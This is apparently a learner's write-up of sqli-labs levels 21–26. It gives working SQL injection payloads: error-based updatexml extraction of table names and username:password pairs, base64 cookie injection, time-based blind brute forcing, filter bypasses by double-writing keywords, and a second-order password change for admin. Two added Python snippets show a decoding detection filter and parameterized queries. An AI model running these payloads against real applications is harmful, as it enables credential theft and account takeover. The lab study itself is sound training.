SQL lab Less21-
I. The sqli-lab range
1. Summary of wheel patterns
So far I have summarized the wheels (reusable payload skeletons) that have appeared, and one conclusion can be drawn: first you need to know how many parameters there are. The first six are single-parameter; multi-parameter cases can only be learned from the error messages, and whether to use --+ or # also depends on what the error shows.
① n' union select 1,2, '
n can be 1 or -1; a ) can follow n'; set the display columns after select as the situation requires
② ')--+
) is optional; ' can be replaced with "
③ ') --+(
) can be replaced with )), ( with ((, and ' with "
④ " --+ or ' # or ' --+
⑤ ' and if(1=1, sleep(1), 1)#
⑥ ") and sleep(1) #
⑦ ', 1, 1)#
⑧ ') and 1 and ('
⑨ '||1||'
⑩ '# or '--+
2. Less-21
a. Identifying the injection point
Same as level 20: capture the traffic and check for injection; I found a request carrying a cookie
But no matter what I added I saw no change; it looks like admin has been base64-encoded
In that case I'll inject inside the encoding
Trying YWRtaW4nIw==, and sure enough it errors
Add another single quote: no error; add one more: error again. That means SQL injection exists
b. Wheel testing
Test with YWRtaW4gJ3doZXJlIDE9MSM=
I found that everything to the right of the single quote is put inside the parentheses; we need a way to get it outside the parentheses
admin ', 1, 1), admin ', 1) and admin ' all just output directly
Whereas admin '
After much testing, the wheel turned out to be admin ') and 1 and ('
') closes admin, and (' closes the ) that the SQL itself carries; the 1 in the middle is ours to play with
Remember: once a wheel runs, it never errors
c. Getting the database name
On top of the wheel, replace the 1 with updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Poc:admin ') and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and ('
BASE64:YWRtaW4gICcpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpKSwweDdlKSBhbmQgKCc=
d. Getting table information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)
Poc:admin ') and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e) and ('
BASE64:YWRtaW4gICcpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBHUk9VUF9DT05DQVQodGFibGVfbmFtZSkgRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgbGltaXQgMCwxKSwweDdlKSwgMHg3ZSkgYW5kICgn
e. Getting column information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)
Poc:admin ') and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e) and ('
BASE64:YWRtaW4gICcpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIGFuZCB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IiBsaW1pdCAwLDEpLDB4N2UpLCAweDdlKSBhbmQgKCc=
f. Getting table data
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)
Poc:admin ') and updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1) and ('
BASE64:YWRtaW4gICcpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgdXNlcm5hbWUgZnJvbSAoc2VsZWN0IHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gdXNlcnMgbGltaXQgMywgMSkgdGVzdCksICI6IiwgKHNlbGVjdCBwYXNzd29yZCBmcm9tIChzZWxlY3QgdXNlcm5hbWUscGFzc3dvcmQgZnJvbSB1c2VycyBsaW1pdCAzLCAxKSB0ZXN0MikpLCAxKSBhbmQgKCc=
Some insights from this level
When you see an error like )LIMIT 0,1, the first thought should be that the SQL has done some filtering, so you can only hand the left part back to the SQL statement as one parameter, pad the right part into the SQL as another, and build one in the middle for our own use
If it is LIMIT 0,1 then there is no filtering and the poc can be added directly
3. Less-22
Looks like level 22 is still cookie injection; this time I must not peek at the SQL statement again, it has to be done independently
a. Identifying the injection point
Same thing, still BASE64-encoded
I found this level has become sensitive to an added double quote
Judging by the error there seems to be no filtering
b. Wheel testing
Since there is no filtering, just add # and try
admin "#
Sure enough, no error, so the wheel " and 1# should be usable
c. Getting the database name
On top of the wheel, replace the 1 with updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Poc:admin" and updatexml(1,concat(0x7e,(SELECT database())),0x7e)#
BASE64:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpKSwweDdlKSM=
d. Getting table information
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)
Poc:admin" and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)#
BASE64:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBHUk9VUF9DT05DQVQodGFibGVfbmFtZSkgRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIFdIRVJFIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgbGltaXQgMCwxKSwweDdlKSwgMHg3ZSkj
e. Getting column information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)
Poc:admin" and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)#
BASE64:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIGFuZCB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IiBsaW1pdCAwLDEpLDB4N2UpLCAweDdlKSM=
f. Getting table data
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)
Poc:admin" and updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)#
BASE64:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgdXNlcm5hbWUgZnJvbSAoc2VsZWN0IHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gdXNlcnMgbGltaXQgMywgMSkgdGVzdCksICI6IiwgKHNlbGVjdCBwYXNzd29yZCBmcm9tIChzZWxlY3QgdXNlcm5hbWUscGFzc3dvcmQgZnJvbSB1c2VycyBsaW1pdCAzLCAxKSB0ZXN0MikpLCAxKSM=
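The Less-21 and Less-22 cookies above carry base64-encoded payloads, so a filter that inspects the raw cookie sees neither a quote nor a keyword. The following added Python example (not code from the original post or from sqli-labs) shows the defender's counterpart: decode the uname cookie first, then inspect the decoded value. The sample cookie values are constructed from the base64 strings used in the walkthrough plus one benign value; the cookie name uname and the SUSPICIOUS pattern are assumptions.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Constructed sample: four Cookie headers as a log filter might see them. The
# base64 uname values are the ones used in the Less-21/22 walkthrough above,
# plus one benign value (base64 of "admin").
SAMPLE_COOKIES = [
    "uname=YWRtaW4=",
    "uname=YWRtaW4nIw==",
    "uname=YWRtaW4gJ3doZXJlIDE9MSM=",
    "uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpKSwweDdlKSM=",
]

# Characters and words that never belong in a plain username: quote
# characters, comment openers and the MySQL functions used in the wheels.
SUSPICIOUS = re.compile(
    r"""['"#]|--|\b(?:and|or|union|select|updatexml|sleep)\b""", re.I)


def decode_uname(cookie: str) -> Optional[str]:
    """Return the decoded uname value, or None when it is absent or not base64."""
    m = re.search(r"uname=([A-Za-z0-9+/=]+)", cookie)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace")


def is_suspicious(decoded: str) -> bool:
    """True when the decoded value carries SQL syntax rather than a name."""
    return SUSPICIOUS.search(decoded) is not None


def scan(cookies: List[str]) -> List[Tuple[Optional[str], bool]]:
    """Decode first, then inspect: the encoded form contains no quote or
    keyword, so a filter that looks at the raw cookie would pass it."""
    results = []
    for cookie in cookies:
        decoded = decode_uname(cookie)
        results.append((decoded, decoded is not None and is_suspicious(decoded)))
    return results


if __name__ == "__main__":
    for decoded, flagged in scan(SAMPLE_COOKIES):
        print(f"{'FLAG' if flagged else ' ok '} {decoded!r}")
```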
4. Less-23
Level 23 goes back to the URL injection we started with; let's see what new tricks it has
a. Identifying the injection point
Adding a single quote at the end immediately errors; adding another does not; one more and it does again. There is SQL injection
b. Wheel testing
Judging by this error there seems to be no filtering
But adding 2 '# directly does not make the error go away
you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2 '' LIMIT 0,1' at line 1
That is, although the single quote triggered the error, id is a string type and was wrapped in double quotes
2" and 1 and '1#
Still errors
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' LIMIT 0,1' at line 1
Why? Is there still something wrong with '1 here?
On closer inspection the left side is not a double quote but two single quotes, so I split those two trailing single quotes apart and inserted and 1 and '3' between them, and only then did it work
2' and 1 and '3''#
c. Getting the database name
On top of the wheel, replace the 1 with updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Poc:2' and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and '3''#
d. Getting table information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)
Poc:2' and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e) and '3''#
e. Getting column information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)
Poc:2' and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e) and '3''#
f. Getting table data
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)
Poc:2' and updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1) and '3''#
5. Less-24
Level 24 goes back to login mode
I found this level still has a cookie; let's try and see whether there is an error
After adding a single quote the input length is the same, but this extra segment appears here; could it be used for testing?
Doesn't seem useful either. Looking at the title, what does "second-level injection" mean? No way around it: for something new I have to look up material online first
Online it seems to be called second-order injection
Only after reading someone else's blog did I learn that you first need to create an odd account, admin'#
Then changing this account's password achieves the goal of changing admin's password, because when the SQL statement hits # it comments out whatever follows. Hmm, that really is clever
Let me have a go at it too
a. Creating the special user
First create this odd user
Created successfully
b. Changing the password
First log in with the user just created, then change the password
c. Changing admin's password
It actually worked, and it actually changed admin's password. That is really something
6. Less-25
a. Identifying the injection point
A single-quote test shows injection exists
b. Wheel testing
?id=2'#
Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1
Let's analyze the structure of the SQL statement
First, '' is given up front, so can we inject between the two single quotes, like before?
But, what is going on
2 and 1'# or 2 or 1'#
and and or have both been deleted; what now
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2 1'' LIMIT 0,1' at line 1
No problem, let's do a double-write bypass
2' anandd 1 anandd '3''#
See that? and is back
c. Getting the database name
On top of the wheel, replace the 1 with updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Poc:2' anandd updatexml(1,concat(0x7e,(SELECT database())),0x7e) anandd '3''#
d. Getting table information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security' limit 0,1),0x7e), 0x7e)
2' anandd updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = "security" limit 0,1),0x7e), 0x7e) anandd '3''#
But it actually errored
It removed the or inside the name too, how nasty; no choice but to keep double-writing
Poc:2' anandd updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM infoorrmation_schema.tables WHERE table_schema = "security" limit 0,1),0x7e), 0x7e) anandd '3''#
This level teaches us to read the echoed output carefully; one or two missing letters can reveal where the problem lies
e. Getting column information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" limit 0,1),0x7e), 0x7e)
Note: and appears here too, and it must also be replaced
Poc:2' anandd updatexml(1, concat(0x7e,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='users' anandd table_schema="security" limit 0,1),0x7e), 0x7e) anandd '3''#
f. Getting table data
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), ":", (select password from (select username,password from users limit 3, 1) test2)), 1)
Same as before, replace the or
Poc:2' anandd updatexml(1, concat(0x7e, (select username from (select username,passwoorrd from users limit 3, 1) test), ":", (select passwoorrd from (select username,passwoorrd from users limit 3, 1) test2)), 1) anandd '3''#
Careful, careful, and careful again, got it?
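The Less-25 filter, as observed above, both lets anandd through and mangles names like information_schema and password. The following added Python example (not the lab's code) models that single-pass keyword removal, reproduces both effects, and contrasts a query that pastes the filtered value into SQL text with a parameterized query on an in-memory SQLite table; the filter order (or, then and), the table rows and the tautology input are assumptions and constructed data.

```python
import re
import sqlite3
from typing import List

def strip_keywords(value: str) -> str:
    """Single-pass blacklist modelled on the Less-25 behaviour seen above
    (assumption: 'or' is removed, then 'and', each once, case-insensitively)."""
    value = re.sub(r"or", "", value, flags=re.I)
    return re.sub(r"and", "", value, flags=re.I)

def strip_until_stable(value: str) -> str:
    """Repeat the blacklist until nothing changes. This closes the double-write
    hole but still corrupts legitimate values, so it is not a fix either."""
    while True:
        stripped = strip_keywords(value)
        if stripped == value:
            return stripped
        value = stripped

def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed rows (not the lab's data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return con

def lookup_concat(con: sqlite3.Connection, user_input: str) -> List[str]:
    """Vulnerable shape: filter, then paste the value into the SQL text.
    A double-written keyword survives the filter and becomes an operator."""
    sql = f"SELECT username FROM users WHERE id='{strip_keywords(user_input)}' LIMIT 1"
    return [row[0] for row in con.execute(sql)]

def lookup_param(con: sqlite3.Connection, user_input: str) -> List[str]:
    """Safe shape: the value is bound as data, so whatever it contains is
    compared against id and can never change the query's structure."""
    rows = con.execute("SELECT username FROM users WHERE id=? LIMIT 1", (user_input,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    tautology = "2' anandd '1'='1"       # constructed tautology, not the page's wheel
    print(strip_keywords(tautology))     # the filter hands back: 2' and '1'='1
    print(lookup_concat(db, tautology))  # ['bob']: the injected condition ran as SQL
    print(lookup_param(db, tautology))   # []: the whole string was treated as a value
    print(strip_keywords("password"))    # passwd: the same filter breaks real data
```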
7. Less-25a
a. Identifying the injection point
The title says blind injection, with and and or filtered; sure enough, entering a single quote gives no error
Entering 1 and 1=1 and 1 and 1=2 gives different results; the first shows the username and password
That is, blind injection does not necessarily require seeing an error; a correct result works too
b. Wheel testing
The wheel is 2 anandd if(1=1, sleep(1), 1)
A 1-second delay; the wheel is usable
Whereas 2 anandd if(1=2, sleep(1), 1)
c. Getting the database name
First determine the length of the database name
2 anandd if(length(database())=8, sleep(1), 1)
A 1-second delay, correct
Next, brute-force the database name
poc:2 anandd if(substr(substr((database()), 1),1,1) = 's', sleep(1), 1)
d. Getting table information
Length check: 2 anandd if(length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security'), 1)) =29, sleep(1), 1)
A 1-second delay, correct
Brute-force the table names
Poc:2 anandd if(substr(substr((select GROUP_CONCAT(table_name) FROM infoorrmation_schema.tables WHERE table_schema = 'security'), 1),1,1) = 's', sleep(1), 1)
e. Getting column information
Length check: 2 anandd if(length(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name='users' anandd table_schema="security"), 1)) =20, sleep(1), 1)
A 1-second delay, correct
Brute-force the column names
2 anandd if(substr(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name='users' anandd table_schema='security'), 1),1,1) = 's', sleep(1), 1)
f. Getting table data
Length check:
2 anandd if(length(substr((select group_concat(username, ':', passwoorrd) from users), 1)) =210, sleep(1), 1)
Brute-force the table data
2 anandd if(substr(substr((select group_concat(username, ':', passwoorrd) from users), 1),1,1) = 's', sleep(1), 1)
I found that enabling multithreading while brute-forcing causes errors; no choice, looks like this one has to run slowly
8. Less-26
This level looks like it filters comments, and it really does: besides and and or, comments are filtered too
2'--+ no longer works; it errors just the same
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1
2'a#
a. Identifying the injection point
The injection point is there, but everything is filtered; next we can only see how to get around it
b. Wheel testing
Same error; this wheel worked before: 2' anandd 1 anandd '3''#
But with the filter added it becomes this
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and1and'3''' LIMIT 0,1' at line 1
That is, it even removed the spaces; this filtering is a bit harsh; no choice but to look for the answer online
After much testing, only this form fits, and there is no need to agonize over whether to use the # comment
2'||1||'
c. Getting the database name
On top of the wheel, replace the 1 with updatexml(1,concat(0x7e,(SELECT database())),0x7e)
Meanwhile, use parentheses in place of spaces
Poc:2'||updatexml(1,concat(0x7e,(SELECT (database()))),0x7e)||'
d. Getting table information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = 'security'),0x7e), 0x7e)
Remember to add () wherever there was a space
Poc:2'||updatexml(1, concat(0x7e,(select (GROUP_CONCAT(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema = 'security')),0x7e), 0x7e)||'
e. Getting column information
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema="security" ),0x7e), 0x7e)
Poc:2'||updatexml(1, concat(0x7e,(select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name='users') anandd (table_schema="security") ),0x7e), 0x7e)||'
f. Getting table data
On top of the wheel, replace the 1 with
updatexml(1, concat(0x7e,(select group_concat(username,":", password) from users where id = 4),0x7e), 0x7e)
2'||updatexml(1, concat(0x7e,(select group_concat(username,":", password) from users where id = 4),0x7e), 0x7e)||'
After adding parentheses where necessary
Poc:2'||updatexml(1, concat(0x7e,(select (group_concat(username,":", passwoorrd)) from (users) where (id) = 4),0x7e), 0x7e)||'
Here id = 4 can be changed to whichever row you want to fetch, e.g.
For space bypasses I looked up a lot of material, but found none of it worked; here only parentheses can be used to get around it